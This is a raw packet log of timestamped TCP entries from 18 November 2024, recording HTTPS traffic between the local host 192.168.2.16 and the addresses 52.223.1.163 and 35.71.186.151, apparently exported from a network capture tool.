                                                                                                                                          Nov 18, 2024 06:48:35.137464046 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.137506962 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.137528896 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.137536049 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.137561083 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.137582064 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.138017893 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.138037920 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.138107061 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.138113022 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.138123989 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.138168097 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.138483047 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.138501883 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.138536930 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.138545036 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.138573885 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.138593912 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.253212929 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.253273964 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.253304005 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.253318071 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.253349066 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.253371000 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.254303932 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.254323959 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.254384041 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.254388094 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.254400015 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.254420042 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.254446983 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.254453897 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.254467010 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.254496098 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.254652023 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.254667044 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.254717112 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.254724979 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.254766941 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.255253077 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.255268097 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.255331993 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.255338907 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.255381107 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.255585909 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.255600929 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.255650997 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.255659103 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.255697966 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.255985975 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.256001949 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.256061077 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.256067991 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.256103992 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.370728016 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.370769024 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.370855093 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.370879889 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.370903969 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.370928049 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.371264935 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.371294022 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.371332884 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.371340990 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.371365070 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.371381998 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.371767998 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.371789932 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.372011900 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.372011900 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.372023106 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.372061014 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.372319937 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.372342110 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.372380972 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.372387886 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.372416019 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.372436047 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.372566938 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.372586012 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.372616053 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.372622967 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.372644901 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.372665882 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.373016119 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.373035908 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.373080969 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.373090029 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.373110056 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.373136044 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.373661995 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.373686075 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.373722076 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.373729944 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.373754978 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.373763084 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.487917900 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.487978935 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.488034010 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.488049984 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.488085032 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.488100052 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.488327026 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.488384008 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.488414049 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.488420963 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.488445997 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.488466978 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.488837004 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.488887072 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.488907099 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.488914967 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.488935947 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.488955975 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.489348888 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.489391088 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.489423990 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.489430904 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.489456892 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.489471912 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.489691973 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.489741087 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.489762068 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.489768028 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.489789009 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.489814043 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.490086079 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.490128994 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.490165949 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.490173101 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.490187883 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.490216017 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.490786076 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.490844965 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.490859985 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.490868092 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.490888119 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.490914106 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.531610012 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.531620979 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.531714916 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.531728983 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.531774998 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.605571985 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.605609894 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.605676889 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.605705976 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.605731964 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.605750084 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.606302977 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.606326103 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.606363058 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.606370926 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.606393099 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.606415033 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.606961012 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.606981993 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.607026100 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.607033014 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.607058048 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.607074022 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.607718945 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.607738972 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.607805014 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.607815027 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.607858896 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.608326912 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.608336926 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.608395100 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.608424902 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.608436108 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.608447075 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.608469963 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.608479023 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.608650923 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.608669043 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.608699083 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.608707905 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.608726025 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.608726978 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.608778000 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.608784914 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.608818054 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.608846903 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.608895063 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.609071970 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.609086037 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:36.585017920 CET52938443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:36.585052013 CET4435293835.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:36.585143089 CET52938443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:36.585419893 CET52938443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:36.585432053 CET4435293835.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:37.243906975 CET4435293835.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:37.244277954 CET52938443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:37.244304895 CET4435293835.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:37.244790077 CET4435293835.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:37.245101929 CET52938443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:37.245187044 CET4435293835.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:37.245249033 CET52938443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:37.291336060 CET4435293835.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:39.748306036 CET4435293835.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:39.748398066 CET4435293835.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:39.748449087 CET52938443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:39.749186993 CET52938443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:39.749197006 CET4435293835.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:39.751925945 CET52939443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:39.751948118 CET4435293952.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:39.752002001 CET52939443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:39.752242088 CET52939443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:39.752250910 CET4435293952.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:40.590986967 CET4435293952.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:40.592391968 CET52939443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:40.592417002 CET4435293952.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:40.592859030 CET4435293952.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:40.594396114 CET52939443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:40.594563007 CET52939443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:40.594568014 CET4435293952.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:40.594609022 CET4435293952.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:40.636271954 CET52939443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:40.789974928 CET4435293952.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:40.790051937 CET4435293952.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:40.790141106 CET52939443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:40.790972948 CET52939443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:40.790992022 CET4435293952.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:48.499917030 CET52942443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:48.499958992 CET4435294235.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:48.500041008 CET52942443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:48.500349045 CET52942443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:48.500363111 CET4435294235.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:49.345963001 CET4435294235.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:49.346415043 CET52942443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:49.346432924 CET4435294235.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:49.346790075 CET4435294235.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:49.347165108 CET52942443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:49.347232103 CET4435294235.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:49.347353935 CET52942443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:49.391341925 CET4435294235.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:51.854880095 CET4435294235.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:51.855161905 CET4435294235.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:51.855293036 CET52942443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:51.855928898 CET52942443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:51.855950117 CET4435294235.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:51.858882904 CET52943443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:51.858907938 CET4435294352.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:51.858972073 CET52943443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:51.859379053 CET52943443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:51.859391928 CET4435294352.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:52.695038080 CET4435294352.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:52.695389032 CET52943443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:52.695409060 CET4435294352.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:52.695730925 CET4435294352.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:52.696046114 CET52943443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:52.696108103 CET4435294352.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:52.696185112 CET52943443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:52.743324041 CET4435294352.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:52.890667915 CET4435294352.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:52.891047955 CET4435294352.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:52.891108990 CET52943443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:52.891720057 CET52943443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:52.891733885 CET4435294352.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:57.065923929 CET52944443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:57.065944910 CET4435294435.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:57.066024065 CET52944443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:57.066346884 CET52944443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:57.066360950 CET4435294435.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:57.989521980 CET4435294435.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:57.989914894 CET52944443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:57.989926100 CET4435294435.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:57.991039038 CET4435294435.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:57.991343021 CET52944443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:57.991485119 CET52944443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:57.991489887 CET4435294435.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:57.991504908 CET4435294435.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:58.036289930 CET52944443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:58.372358084 CET55198443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:58.372389078 CET4435519835.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:00.362546921 CET4435294435.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:00.404299021 CET52944443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:00.404366970 CET4435294435.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:00.404707909 CET52944443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:00.404829025 CET4435294435.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:00.404906988 CET52944443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:00.408385992 CET52945443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:49:00.408454895 CET4435294552.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:00.408554077 CET52945443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:49:00.408788919 CET52945443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:49:00.408821106 CET4435294552.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:01.262912989 CET4435294552.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:01.263310909 CET52945443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:49:01.263326883 CET4435294552.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:01.264436960 CET4435294552.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:01.264753103 CET52945443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:49:01.264883041 CET52945443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:49:01.264889002 CET4435294552.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:01.264925003 CET4435294552.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:01.315263033 CET52945443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:49:01.462913036 CET4435294552.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:01.463133097 CET4435294552.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:01.463218927 CET52945443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:49:01.469022989 CET52945443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:49:01.469042063 CET4435294552.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:04.161443949 CET52946443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:04.161498070 CET4435294635.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:04.161623955 CET52946443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:04.161859035 CET52946443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:04.161889076 CET4435294635.71.186.151192.168.2.16
